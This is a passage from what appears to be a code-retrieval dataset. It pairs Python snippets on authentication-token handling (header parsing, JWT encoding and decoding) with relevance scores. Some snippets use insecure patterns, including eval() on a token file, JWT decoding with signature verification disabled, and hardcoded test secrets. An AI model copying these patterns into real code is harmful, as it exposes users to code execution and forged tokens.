Please login!')", "def decode_authorization(authorization: str) -> tuple:\n split = authorization.split(\" \")\n\n if len(split) != 2 or split[0] != \"Basic\":\n raise virtool.errors.AuthError(\"Malformed authorization header\")\n\n decoded = base64.b64decode(split[1]).decode(\"utf-8\")\n\n user_id, key = decoded.split(\":\")\n\n return user_id, key", "def auth_sub_string_from_body(http_body):\n for response_line in http_body.splitlines():\n if response_line.startswith('Token='):\n # Strip off Token= and return the token value string.\n return response_line[6:]\n return None", "def deserialize_tokens():\n\ttry:\n\t\twith open(config.TOKENPATH, \"r+\") as f:\n\t\t\tcontext = f.read()\n\t\t\tres = eval(context)\n\t\t\t# load into memory\n\t\t\treturn res[\"access_token\"], res[\"refresh_token\"]\n\texcept:\n\t\t# unexcept token format\n\t\tfrom common import ApplicationException\n\t\traise ApplicationException(\"authorization file is broken, please run init\")", "def decode_token_service_key(credentials, token, verify=True):\n return _decode_token(credentials, token, verify)", "def decode(self, token, verify=True):\n try:\n return jwt.decode(\n token,\n self.get_verifying_key(token),\n algorithms=[self.algorithm],\n audience=self.audience,\n issuer=self.issuer,\n leeway=self.leeway,\n options={\n 'verify_aud': self.audience is not None,\n 'verify_signature': verify,\n },\n )\n except InvalidAlgorithmError as ex:\n raise TokenBackendError(_('Invalid algorithm specified')) from ex\n except InvalidTokenError:\n raise TokenBackendError(_('Token is invalid or expired'))", "def get_auth_token_teacher():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def validate_token(self, data):\n try:\n payload = jwt.decode(data, settings.SECRET_KEY, algorithms=['HS256'])\n except jwt.ExpiredSignatureError:\n raise serializers.ValidationError('Verification link has expired')\n except jwt.PyJWTError:\n raise serializers.ValidationError('Invalid token.')\n\n if payload['type'] != 'email_confirmation':\n raise serializers.ValidationError('Invalid token.')\n\n self.context['payload'] = payload\n return data", "def UserToken(self) -> object:", "def get_token_auth_header():\n auth = request.headers.get('Authorization', None)\n if not auth:\n raise AuthError({'code': 'authorization_header_missing',\n 'description': 'Authorization header is expected'}, 401)\n\n parts = auth.split()\n\n if parts[0].lower() != 'bearer':\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header must start with Bearer'}, 401)\n\n if len(parts) < 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Token not found after Bearer'}, 401)\n\n if len(parts) > 2:\n raise AuthError({'code': 'invalid_header',\n 'description': 'Authorization header is an invalid token structure'}, 401)\n\n return parts[1]", "def verify_jwt(token):\n return jwt.decode(token.encode(), SECRET_KEY)", "def decode_jwt(self, token):\n key = self.master_secret\n public_key = self.public_key\n if self.public_key_file is not None:\n with open(self.public_key_file, 'r') as rsa_pub_file:\n public_key = rsa_pub_file.read()\n if public_key is not None:\n key = public_key\n if self.leeway is not None:\n leeway = self.leeway\n else:\n leeway = 0\n options = {\n 'verify_exp': self.verify_expiration,\n }\n try:\n claims_set = jwt.decode(\n token,\n key,\n options=options,\n leeway=leeway,\n issuer=self.issuer\n )\n except (jwt.DecodeError, jwt.ExpiredSignature):\n return None\n 
return claims_set", "def parse_token_result(self, res: dict, what: str) -> None:\n if 'error' in res:\n message: str = '{}: {}'.format(what, res['error'].get('message'))\n code: int = int(res['error'].get('code'))\n\n if code == 401:\n raise TokenExpiredError(message, code)\n else:\n raise AuthenticationTokenError(message, code)\n\n self.token = res.get('_TOKEN')\n\n expires_at = res.get('expires-at')\n if expires_at:\n self.expires_at = int(expires_at)\n else:\n expires_in = res.get('expires_in')\n if expires_in:\n self.expires_at = self.get_epoch_millis() + int(expires_in) * 1000\n\n refresh_token = res.get('refresh_token')\n if refresh_token:\n self.refresh_token = refresh_token\n\n self.last_update = self.get_epoch_millis()", "def load_token(token):\n \n #The Token itself was generated by User.get_auth_token. So it is up to \n #us to known the format of the token data itself. \n \n #The Token was encrypted using itsdangerous.URLSafeTimedSerializer which \n #allows us to have a max_age on the token itself. When the cookie is stored\n #on the users computer it also has a exipry date, but could be changed by\n #the user, so this feature allows us to enforce the exipry date of the token\n #server side and not rely on the users cookie to exipre. \n max_age = REMEMBER_COOKIE_DURATION.total_seconds()\n \n #Decrypt the Security Token, data = [username, hashpass]\n data = login_serializer.loads(token, max_age=max_age)\n \n #Find the User\n user = load_user(data[0])\n \n #Check Password and return user or None\n if user and data[1] == user.password:\n return user\n return None", "def jwt_token_verify(auth_header):\n # Hug do not extract Bearer prefix\n auth_token, payload = parse_header(auth_header)\n return payload", "def test_token(self):\r\n expected = \"eyJhbGciOiAiSFMyNTYiLCAidHlwIjogIkpXVCJ9.eyJpc3N1ZWRBdCI6ICIyMDE0LTAyLTI3VDE3OjAwOjQyLjQwNjQ0MSswOjAwIiwgImNvbnN1bWVyS2V5IjogImZha2Vfc2VjcmV0IiwgInVzZXJJZCI6ICJ1c2VybmFtZSIsICJ0dGwiOiA4NjQwMH0.Dx1PoF-7mqBOOSGDMZ9R_s3oaaLRPnn6CJgGGF2A5CQ\"\r\n response = retrieve_token(\"username\", \"fake_secret\")\r\n\r\n # because the middle hashes are dependent on time, conly the header and footer are checked for secret key\r\n self.assertEqual(expected.split('.')[0], response.split('.')[0])\r\n self.assertNotEqual(expected.split('.')[2], response.split('.')[2])", "def test_encode_decode_token(create_user):\n user = create_user\n user_data = {\n \"email\": user.email,\n \"username\": user.username\n }\n jwt = JWTAuthentication()\n # encode token\n encoded_token = jwt.generate_token(user_data)\n assert type(encoded_token) is str # test encoding is 'utf-8'\n # decode token\n user_details = jwt.decode_token(encoded_token)\n assert user_details['userdata'] == user_data # test token details", "def get_auth_token_student():\n\n token = g.user.generate_auth_token(600)\n return jsonify({'token': token.decode('ascii'), 'duration': 600})", "def token(self):\n \n payload = {\n 'sub_type': self.sub_type,\n '_hash' : self._hash,\n 'jti' : str(uuid.uuid4())\n }\n return jwt.encode(payload, self.secret, self.algo).decode('utf-8')", "def get_token_auth_header():\n # Get authorization form request header\n auth = request.headers.get('Authorization', None)\n # Check if authorization header exists\n if not auth:\n raise AuthError({\n 'code': 'authorization_header_missing',\n 'description': 'Authorization header is MISSING!'\n }, abort(401))\n # If bearer token, then first part of string = 'bearer'\n parts = auth.split()\n if parts[0].lower() != 'bearer':\n raise 
AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must start with \"Bearer\"'\n }, abort(401))\n # Authorization header string length must be 2\n elif len(parts) != 2:\n raise AuthError({\n 'code': 'invalid_header',\n 'description': 'Authorization header must be a BEARER token'\n }, abort(401))\n\n token = parts[1]\n return token", "def decodeAccesshTokenForRefreshToken( accessToken):\n try:\n payload = jwt.decode(accessToken, ApiJWTAuthentication.secretKey_access)\n return {\"message\": \"success\",\"refresh_token\": payload['refresh_token']}\n except jwt.ExpiredSignatureError:\n return {\"message\": \"Expired Access Token\"}\n except jwt.InvalidTokenError:\n return {\"message\": \"Invalid access Token\"}", "def getJWTtoken(self):\n\n token = False\n try:\n res = self.s.get(self.url + 'tokens/jwt', auth=(self.username, self.password), verify=False)\n res.raise_for_status()\n except:\n logger.error(res)\n raise\n token = vsdModels.Token(**res.json())\n try:\n payload = jwt.decode(token.tokenValue, verify=False)\n\n except jwt.InvalidTokenError as e:\n logger.error('token invalid, try using Basic Auth{0}'.format(e))\n raise\n\n return token", "def get_auth_token(cls):\n return jsonify({\n 'user': current_user.serialize(),\n 'token': current_user.get_auth_token(),\n })", "def decoded(self):\n return self._decoded", "def test_token_format(self):\n bearer_token =self.download.get_authorization()\n bearer = bearer_token.split(' ')[0]\n self.assertEqual('Bearer', bearer)", "def _authenticate(self):\n url = self.endpoint + \"/tokens\"\n h = httplib2.Http()\n response, rawcontent = h.request(\n url, \n method=\"POST\",\n headers={ \"Content-Type\":\"application/json\" },\n body=json.dumps(self.credentials()))\n content = json.loads(rawcontent)\n self.token = content['access']['token']['id']\n #TODO: this needs to convert the ISO8601 string to a timestamp\n self.expiration = content['access']['token']['expires']\n self.catalog = content['access']['serviceCatalog']", "def get_client_login_token_string(http_body):\n for response_line in http_body.splitlines():\n if response_line.startswith('Auth='):\n # Strip off the leading Auth= and return the Authorization value.\n return response_line[5:]\n return None", "def test_generate_and_validate_token(self):\n\n audience = 'http://www.service.teletracking.com/'\n roles = {'role': ['admin', 'user'], 'audience': audience}\n secret = 'drMemxWrLen6fCXQA5jO6gXkK/UoZVzPGRDiff7ByPU='\n token = AuthenticationHandler.generate_auth_token(roles, secret)\n decoded_token = AuthenticationHandler.validate_and_decode_token(\n token=token, key=secret,\n audience=audience\n )\n self.assertTrue(decoded_token['role'][0] == 'admin')\n self.assertTrue(decoded_token['role'][1] == 'user')", "def getToken(request):\n try:\n token = request.META['HTTP_AUTHORIZATION'].split()[1]\n except:\n token = \"\"\n return token", "def get_auth_token(self, request: Request, type=\"Bearer\") -> str:\n if \"Authorization\" not in request.headers:\n raise AuthenticationRequiredException\n try:\n auth_type, auth_code = request.headers[\"Authorization\"].split(' ')\n assert auth_type == type\n except Exception:\n raise AuthenticationSchemeInvalidException\n return auth_code", "def _get_auth_string(self):", "def token(self):\n return self[\"token\"]", "def get_token(self, obj):\n jwt_payload_handler = api_settings.JWT_RESPONSE_PAYLOAD_HANDLER\n jwt_encode_handler = api_settings.JWT_ENCODE_HANDLER\n\n payload = jwt_payload_handler(obj)\n token = 
jwt_encode_handler(payload)\n\n return token", "def verify_auth_token(token):\n serializer = Serializer(SECRET_KEY)\n try:\n data = serializer.loads(token)\n except SignatureExpired:\n return None # valid token, but expired\n except BadSignature:\n return None # invalid token\n return data['token']", "def get_access_token(self, decode: bool = False) -> Union[Dict, str]:\n token = os.environ.get('NEXTCODE_ACCESS_TOKEN') or get_access_token(self.profile.api_key)\n if decode:\n return decode_token(token)\n else:\n return token", "def _requestSwiftToken(self):\n oauth_access_token = self.accessTokenManager.token\n c, r = http._get(\n self.auth_package.HUBIC_API+'account/credentials/',\n headers={\n 'Authorization': 'Bearer '+oauth_access_token\n }\n )\n result = json.loads(r.read())\n c.close()\n\n if r.status != 200:\n try:\n err =result\n err['code'] = r.status\n except Exception as e:\n err = {}\n\n raise Exception(\"Unable to get swift token, \"\n \"(%s)\"%str(err))\n\n self._endpoint = result['endpoint']\n self._token = result['token']\n self._expire = datetime.strptime( result['expires'][:-6], \"%Y-%m-%dT%H:%M:%S\" ) - timedelta(seconds=10)", "def get_token_auth_header():\n auth = request.headers.get(\"Authorization\", None)\n if not auth:\n return \"authorization_header_missing\"\n\n parts = auth.split()\n\n if parts[0].lower() != \"bearer\":\n return \"invalid_header\"\n elif len(parts) == 1:\n return \"invalid_header\"\n elif len(parts) > 2:\n return \"invalid_header\"\n\n token = parts[1]\n return token", "def decode_mac_id(self, request, id):\n # There might be multiple secrets in use, if we're in the\n # process of transitioning from one to another. Try each\n # until we find one that works.\n secrets = self._get_token_secrets(request)\n for secret in secrets:\n try:\n data = tokenlib.parse_token(id, secret=secret)\n key = tokenlib.get_token_secret(id, secret=secret)\n break\n except ValueError:\n pass\n else:\n raise ValueError(\"invalid MAC id\")\n return key, data" ]
[ "0.78745645", "0.7660959", "0.76199704", "0.7532894", "0.7487862", "0.7487477", "0.74580514", "0.7387891", "0.73657256", "0.7325584", "0.7293769", "0.72489196", "0.72383934", "0.7121377", "0.7056912", "0.6959151", "0.6953844", "0.69251376", "0.6916667", "0.6878888", "0.6865261", "0.68635124", "0.6850052", "0.6803329", "0.6776945", "0.6770453", "0.67565155", "0.665575", "0.6652748", "0.65494734", "0.6546161", "0.6500037", "0.64749074", "0.6458157", "0.6441215", "0.64403373", "0.6437036", "0.64157397", "0.63937074", "0.63731074", "0.6336809", "0.62740964", "0.6273089", "0.6224306", "0.6204993", "0.6172478", "0.616131", "0.61419666", "0.61323404", "0.61302114", "0.6123681", "0.61142945", "0.6097683", "0.6064958", "0.6063718", "0.60617983", "0.60608995", "0.60512406", "0.604279", "0.60353285", "0.6031607", "0.6015445", "0.60001856", "0.5953301", "0.59458905", "0.59424335", "0.59332514", "0.5928422", "0.59064794", "0.59020805", "0.5896034", "0.5877746", "0.58725977", "0.58643645", "0.586001", "0.5855901", "0.58538514", "0.583202", "0.58300716", "0.58288795", "0.58209044", "0.5818912", "0.5813887", "0.5811596", "0.58099705", "0.5809515", "0.57964164", "0.5793839", "0.5784412", "0.57756764", "0.5765388", "0.5765271", "0.5761787", "0.5761596", "0.57476383", "0.57442415", "0.5736206", "0.5724802", "0.5724706", "0.5721829" ]
0.7564726
3
Returns the Saved news object data in serializable format
def serialize(self): return { "id": self.id, "headline": self.headline, "url": self.url, "image": self.image, "shortDescription": self.shortDescription, "saved": True, "date": self.date, "savedDate": self.savedDate }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def serialized_data(self):\n return {\n 'id': self.id,\n 'start_time': str(self.start_time),\n 'venue_id': self.venue_id,\n 'venue_name': self.venue.name,\n 'venue_image_link': self.venue.image_link,\n 'artist_id': self.artist_id,\n 'artist_name': self.artist.name,\n 'artist_image_link': self.artist.image_link\n }", "def serialize(self):", "def serialize(self):\n\t\treturn {\n\t\t\t'id': self.id,\n\t\t\t'title': self.title,\n\t\t\t'year': self.year,\n\t\t\t'artist': self.artist_id,\n\t\t\t'user': self.user_id\n\t\t}", "def serialize(self):\n return {\n 'name' : self.name,\n 'description' : self.description,\n 'id' : self.id,\n 'picture' : self.picture,\n 'catalog_id' : self.catalog_id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'description': self.description,\n 'ranking': self.ranking,\n 'created_date': self.created_date,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'description': self.description,\n 'longitude' : self.longitude,\n 'latitude' : self.latitude,\n 'created_on' : self.created_on,\n 'created_by' : self.created_by,\n 'likes' : self.likes\n }", "def serialize(self, data):", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'description': self.description,\n 'body': self.body,\n }", "def serialize(self):\n return{\n 'name': self.name,\n 'sport': self.sport,\n 'description': self.description,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'title': self.title,\n 'first_author': self.first_author,\n 'second_author': self.second_author,\n 'publisher': self.publisher,\n 'year_of_publication': self.year_of_publication\n }", "def serialize(self):\n return {\n 'title': self.title,\n 'description': self.description,\n 'id': self.id,\n }", "def saveData(self):\n pass", "def serialize(self):\r\n return {\r\n \"book_id\": self.id,\r\n \"title\": self.title,\r\n \"author\": self.author,\r\n \"category\": self.category,\r\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'desc': self.desc,\n 'category_id': self.category_id,\n }", "def serialized_data(self):\n upcoming_shows = self.upcoming_shows\n past_shows = self.past_shows\n\n return {\n 'id': self.id,\n 'name': self.name,\n 'phone': self.phone,\n 'image_link': self.image_link,\n 'facebook_link': self.facebook_link,\n 'city': self.city.name,\n 'state': self.city.state_name,\n 'num_upcoming_shows': len(upcoming_shows),\n 'upcoming_shows_count': len(upcoming_shows),\n 'upcoming_shows': upcoming_shows,\n 'past_shows': past_shows,\n 'past_shows_count': len(past_shows),\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'title': self.title,\n 'description': self.description,\n 'cat_id': self.cat_id,\n 'user_id': self.user_id\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date_time' : str(self.date_time),\n 'duration' : self.duration,\n 'highlights' : self.highlights,\n 'conference_id' : self.conference_id,\n 'type_of_session_id' : self.type_of_session_id,\n 'speaker_id' : self.speaker_id,\n 'location_id' : self.location_id,\n 'documents' : self.documents \n }", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n 'user_id' : self.user_id,\n 'last_edit' : self.time_str, \n }", "def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"detail\": self.detail,\n \"date_on\": self.date_on,\n }", "def serialized_data(self):\n upcoming_shows = self.upcoming_shows\n past_shows = 
self.past_shows\n\n return {\n 'id': self.id,\n 'name': self.name,\n 'address': self.address,\n 'phone': self.phone,\n 'image_link': self.image_link,\n 'facebook_link': self.facebook_link,\n 'city': self.city.name,\n 'state': self.city.state_name,\n 'genres': self.genres if self.genres else [],\n 'website': self.website,\n 'seeking_description': self.seeking_description,\n 'seeking_talent': self.seeking_talent,\n 'num_upcoming_shows': len(upcoming_shows),\n 'upcoming_shows_count': len(upcoming_shows),\n 'upcoming_shows': upcoming_shows,\n 'past_shows': past_shows,\n 'past_shows_count': len(past_shows),\n }", "def serialize(self):\n return{\n # 'date': self.date,\n 'date': self.date,\n 'id': self.id,\n }", "def save_data(self):\n pass", "def serialize(self):\n return {\n 'id': self.id,\n 'publication_id': self.publication_id,\n 'filename': self.filename,\n 'is_valid_format': self.is_valid_format,\n 'format_validation_message': self.format_validation_message,\n 'is_valid_data': self.is_valid_data,\n 'data_validation_message': self.data_validation_message,\n # 'user_id': self.user_id\n 'user_name': self.user.name\n }", "def serialize(self):\n pass", "def serialize(self):\n return {\n\n\n }", "def serialize(self, data):\n return data", "def dump(self):\n return self._data.dump()", "def serialize(self):\n\t\treturn {\n\t\t\t'id': self.id,\n\t\t\t'title': self.title,\n\t\t\t'tracknum': self.track_num,\n\t\t\t'video': self.video_id\n\t\t}", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'date' : str(self.date),\n 'owner_id' : self.owner_id,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'session_id' : self.session_id,\n 'filename' : self.filename,\n 'filetype' : self.filetype\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n 'date_added': self.date_added,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'event_url' : self.event_url,\n 'event_thumbnail_url' : self.event_thumbnail_url,\n 'description' : self.description,\n 'ticket_price' : self.ticket_price,\n 'start_date' : str(self.start_date),\n 'featued' : self.featured\n }", "def serialize(self):\n return self.record", "def serialize(self):\n return {\n \"id\": self.id,\n \"title\": self.title,\n \"price\": str(self.price),\n \"description\": self.description,\n \"location\": self.location,\n \"listing_owner\": self.listing_owner,\n \"photos\": [photo.serialize() for photo in self.photos],\n }", "def serialize(self):\r\n return {\r\n 'id': self.id,\r\n 'name': self.name,\r\n 'picture': self.picture,\r\n 'description': self.description,\r\n 'category_slug': self.category_slug}", "def serialize(self, obj):\n return obj", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'owner' : self.user.name,\n 'room' : self.room.name,\n 'description' : self.description,\n 'price' : self.price,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n 'price': self.price,\n 'course': self.course,\n 'restaurant_id': self.restaurant_id\n }", "def serialize(self):\n return {\n 'name' :self.name,\n 'points' :self.pts,\n 'id' :self.id,\n 'league_id':self.league_id,\n 'userID':self.user_id\n }", "def data(self):\n retval = copy.deepcopy(self.__dict__)\n retval[\"_Serializable_classname\"] = type(self).__name__\n retval[\"_Serializable_version\"] = \"1.0\"\n return retval", "def serialize(self, obj):\n pass", "def to_data(self):\n return self.data", 
"def dumps(self):\n return dumps(self)", "def GetDataAsObject(self):", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'category': self.category\n }", "def serialize(self):\n return {\n \"id\": self.id,\n \"name\": self.name,\n \"currency\": self.currency,\n \"old_price\": self.old_price,\n \"price\": self.price,\n \"availability\": self.availability,\n \"url\": self.url,\n \"img_url\": self.img_url\n }", "def serialize(self):\n return {\n 'item_id': self.item_id,\n 'list_id': self.list_id,\n 'name': self.name,\n 'date_time': dump_datetime(self.date),\n 'amount': self.amount,\n 'bought': self.bought,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'id': self.id,\n 'price': self.price,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'userID': self.userID,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n 'category_id': self.category_id,\n }", "def serialize(self):\n return {\n 'name' :self.name,\n 'position':self.position,\n 'id' :self.id,\n 'team_id':self.team_id,\n 'league_id':self.league_id,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'url': self.url,\n 'created': self.created,\n 'update': self.update,\n 'active': self.active,\n }", "def serialize(self):\r\n return {\r\n 'name': self.name,\r\n 'description': self.description,\r\n 'id': self.id,\r\n 'category': self.category_name\r\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n }", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n }", "def dump(self):\n return json.dumps(self.__data)", "def serialize(self):\n return {\n 'lapyname': self.lapyname,\n 'speciality': self.speciality,\n 'ram': self.ram,\n 'storage': self.storage,\n 'warrenty': self.warrenty,\n 'price': self.price,\n 'rating': self.rating,\n 'date': self.date,\n 'id': self. 
id\n }", "def get_data(self):\n data = {\n \"ts\": self.drone.pos[0][0],\n \"drone\": self.drone,\n \"subject\": self.subject,\n \"peds\": self.peds, # can be None\n \"objs\": self.objs # can be None\n }\n self.empty_bag()\n return data", "def serialized_data(self):\n return {\n 'id': self.id,\n 'city': self.name,\n 'state': self.state_name\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'id': self.id,\n }", "def serialize(self):\n return{\n 'name':self.name,\n 'id' :self.id,\n }", "def dump():\n\t\treturn self.__dict__;", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n }", "def dumps(self) -> Dict[str, Any]:\n return {\"number\": self.number, \"title\": self.title}", "def dumps(self) -> Dict[str, Any]:\n return {\"name\": self.name, \"date\": self.date}", "def serialize(self):\n return {\n 'list_id': self.list_id,\n 'name': self.name,\n 'date_time': dump_datetime(self.date)\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'description': self.description,\n }", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'description' : self.description,\n 'is_private' : self.is_private,\n }", "def serialize(self):\r\n return {\r\n 'likes': self.likes,\r\n 'dislike': self.dislike,\r\n 'id': self.id\r\n }", "def serialize(self):\n return {\n 'id' : self.id,\n #had to change to 'title' for full calendar, might change\n 'title' : self.name,\n 'host' : self.created_by,\n 'start' : self.start_on.isoformat(),\n 'end' : self.end_on.isoformat(),\n 'description' : self.description,\n 'color' : 'blue',\n }", "def save_news(self, obj_list: List[Tag]) -> str:\n for obj in obj_list:\n header = obj.text.strip()\n if not header:\n if 'alt' in obj.__dict__:\n header = obj.get('alt').strip()\n # other if else\n news = News(\n origin=self.get_self_name(),\n header=header\n )\n news.save()\n return f'Data from service {self.get_self_name()} loaded successfully.'", "def dico_save(self):\r\n\t\tdic = (self.__dict__).copy()\r\n\t\tdel dic['trparas']\r\n\t\tdic.update(self.trparas.dico_save())\r\n\t\treturn dic", "def saveClassroomData():\n with open(\"ClassRoomData.txt\",\"wb\") as classroomData:\n pickle.dump(classroomEntities,classroomData)", "def _serialise(self):\n # TODO (M Foley)\n pass", "def Export(self):\n\n current_time = datetime.datetime.now(tz.UTC)\n\n self.data = np.load(self.cache_path, allow_pickle=True)[()]\n\n news = []\n\n ID = self.data.keys()\n\n for id in ID:\n v = self.data[id]\n if 'address' in v and \"河南\" in v['address'] and v['valid'] == 1\\\n and current_time - parse(v['time']) < datetime.timedelta(hours=12):\n news.append({\"Time\": v['time'], \"address\": v['address'], \"location\": v['location'], \"post\": v['post'],\n \"link\": v[\"link\"]})\n\n with open(self.output_path, \"w\", encoding=\"utf-8\") as fp:\n json.dump(news, fp, ensure_ascii=False, indent=4)\n\n print(\"Export %d info\" % len(news))", "def persistence_serialize(self):\n raise NotImplementedError", "def serialize(self):\n return{\n # 'date': self.date,\n 'q1': self.q1,\n 'q2': self.q2,\n 'q3': self.q3,\n 'q4': self.q4,\n 'finalscore': self.finalscore,\n 'id': self.id,\n }", "def serialize(self):\r\n return {\r\n 'slug': self.slug,\r\n 'title': self.title,\r\n }", "def saveData(self):\n\n data = super(OSSMouthGuide, self).saveData()\n\n # this should live in the GuideClass - also should considere Inherited Types\n data = 
self.saveAllObjectData(data, \"Control\")\n data = self.saveAllObjectData(data, \"Transform\")\n\n return data", "def serialize(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'description': self.description,\n 'catalog': self.catalog.serialize,\n }", "def get_save_data(self):\n return {\n 'separator': self.separator,\n 'scanner': None if self.scanner is None else self.scanner.save(),\n 'parser': None if self.parser is None else self.parser.save()\n }", "def serialize(self):\r\n return {\r\n 'id': self.id,\r\n 'name': self.name,\r\n 'email': self.email,\r\n 'phone_number': self.phone_number,\r\n 'spam_likelihood': self.spam_likelihood\r\n }", "def dump(self):\n return {\"data\": self.data, \"encoding\": self.encoding,\n \"type\": self.type_name}", "def get_data(self):\n return self.data.to_json()", "def serialize(self):\n return {\n 'special_messages': self.special_messages,\n 'description': self.description,\n 'name': self.name,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n }", "def serialize (self):\r\n return { 'target': self.target, 'buildDestination': self.buildDestination, \\\r\n 'saveDestination': self.saveDestination, \\\r\n 'storyPanel': self.storyPanel.serialize() }", "def _data_to_save(self) -> SerializedPipelineStorageCollection:\n base_data = super()._base_data_to_save()\n return {\n \"items\": base_data[\"items\"],\n \"preferred_item\": self._preferred_item,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'id': self.id,\n 'price': self.price,\n }", "def __repr__(self):\r\n\r\n return f\"<News: id = {self.news_id}, title = {self.title} summary = {self.summary}>\"", "def serialize(self):\n return{\n 'name': self.name,\n 'id': self.id,\n }", "def serialize(self):\n return {\n 'name' : self.name,\n 'id' : self.id,\n 'email' : self.email,\n 'picture' : self.picture,\n }", "def serialize(self):\n return {\n 'name': self.name,\n 'description': self.description,\n 'id': self.id,\n 'price': self.price,\n 'catch_phrase': self.catch_phrase,\n }", "def dump_model(self):", "def serialize(self):\n return {\n 'id' : self.id,\n 'name' : self.name,\n 'phone' : self.phone,\n 'email' : self.email,\n 'address' : self.address,\n 'picture' : self.picture,\n }", "def getData(self):\n return dict(self._dump_data)", "def data(self):\n return self.__dict__", "def dumps(self):\n pass" ]
[ "0.67177093", "0.67075676", "0.66094065", "0.6601732", "0.6585369", "0.6565495", "0.6531196", "0.649494", "0.64723766", "0.64716303", "0.64442974", "0.64352673", "0.6431501", "0.64202684", "0.64165074", "0.64140564", "0.64076835", "0.64070576", "0.6395844", "0.6394233", "0.63878274", "0.63833", "0.6366175", "0.6345943", "0.63291746", "0.6319308", "0.63157916", "0.630657", "0.6305174", "0.629103", "0.62800664", "0.62729317", "0.62590516", "0.6227378", "0.6209122", "0.620724", "0.620418", "0.6177806", "0.6177001", "0.6149564", "0.61478734", "0.6141348", "0.61370635", "0.6131796", "0.6120771", "0.6113255", "0.6109043", "0.6101868", "0.6096252", "0.60874826", "0.60832655", "0.6070097", "0.605734", "0.6044964", "0.6044964", "0.6044964", "0.60419756", "0.6024577", "0.60171604", "0.6016146", "0.60092103", "0.60052264", "0.59978783", "0.59971464", "0.59971464", "0.59957534", "0.5990181", "0.59890527", "0.5988647", "0.5985847", "0.5983392", "0.5981151", "0.5981131", "0.597915", "0.59699357", "0.59679985", "0.59665585", "0.59639996", "0.5957637", "0.5957535", "0.5949314", "0.5946205", "0.5945486", "0.5940272", "0.59402263", "0.59353954", "0.593319", "0.593272", "0.5930174", "0.5930107", "0.5928172", "0.59148824", "0.5914789", "0.5912785", "0.59093237", "0.59010655", "0.59008133", "0.5895996", "0.5894904", "0.5894512" ]
0.6998519
0
This method is responsible for getting the messages to respond with. Also covers analytics events for those messages, e.g. click, view
def respond_to_message(self): MessageEventHandler(self.state, self.meta_data, self.message_data).handle_events(events=self.events) data = Converter(self.state).get_messages(meta_data=self.meta_data, message_data=self.message_data) outgoing_messages = data.get("messages", []) events_to_publish = data.get("publish_events", []) agent_messages = [message["message"] for message in outgoing_messages if message["sending_to"] == "AGENT"] user_messages = [message["message"] for message in outgoing_messages if message["sending_to"] == "USER"] agent_response = Util.send_messages(messages=agent_messages, sending_to="AGENT") user_response = Util.send_messages(messages=user_messages, sending_to="USER") if agent_response or user_response: Util.update_state(meta_data=self.meta_data, state=self.state) Util.log_events(meta_data=self.meta_data, state=self.state, events=events_to_publish) return 1
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def process_messages(self):\n pass", "def handle_message(self, message):", "def handle_messages():\n print(\"Handling Messages\")\n payload = request.get_data()\n for sender, incoming_message, payload in messaging_events(payload):\n # The following statements check which options the user selected\n # Response handler contains \"templates\" for the various messages\n user_name = get_full_name(sender, PAT)\n if \"hei\" in incoming_message.lower() or \"hallo\" in incoming_message.lower() or \"yo\" in incoming_message.lower()\\\n or \"hi\" in incoming_message.lower():\n send_message(PAT, send_message(PAT, response_handler.greeting_message(sender, user_name)))\n if user_methods.has_user(user_name):\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n else:\n send_message(PAT, response_handler.no_course(sender))\n\n elif payload == \"change subject\" or \"change subject\" in incoming_message.lower():\n send_message(PAT, response_handler.text_message(sender, \"You can change course at any time simply by \"\n \"writing the course code on the form [TAG][CODE]\\n\"\n \"ex. TDT4120\"))\n send_message(PAT, response_handler.has_course(sender, user_methods.get_subject_from_user(user_name)))\n\n elif \"help\" in incoming_message.lower():\n\n send_message(PAT, response_handler.text_message(sender, \"Are you lost ...? \"))\n send_message(PAT, response_handler.text_message(sender, \"You can change course at any time simply by \"\n \"writing the course code on the 